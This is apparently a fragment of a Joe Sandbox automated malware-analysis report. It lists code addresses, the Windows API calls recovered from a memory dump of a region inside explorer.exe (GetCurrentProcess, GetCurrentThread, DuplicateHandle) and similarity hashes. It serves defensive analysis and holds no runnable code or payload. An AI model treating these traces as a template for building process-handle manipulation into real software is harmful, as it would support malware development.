                  0x00000000
                  0x00081b76
                  0x00081b70
                  0x00081c5d
                  0x00081c63
                  0x00081c63
                  0x00081bb8
                  0x00081bcc
                  0x00081bcf
                  0x00081bd9
                  0x00081be5
                  0x00081bef
                  0x00081bf0
                  0x00081bf1
                  0x00081bf2
                  0x00081bf7
                  0x00081c00
                  0x00081c04
                  0x00081c06
                  0x00081c07
                  0x00081c0f
                  0x00081c10
                  0x00081c16
                  0x00081c1b
                  0x00081c21
                  0x00081c21
                  0x00081c26
                  0x00081c31
                  0x00081c34
                  0x00081c3c
                  0x00081c48
                  0x00081c4b
                  0x00081c51
                  0x00081c56
                  0x00081c5b
                  0x00000000

                  APIs
                  • GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
                  • GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
                  • GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
                  • DuplicateHandle.KERNEL32 ref: 00081BD9
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Current$Process$DuplicateHandleThread
                  • String ID:
                  • API String ID: 3566409357-0
                  • Opcode ID: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                  • Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
                  • Opcode Fuzzy Hash: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                  • Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52
                  Uniqueness

                  Uniqueness Score: -1.00%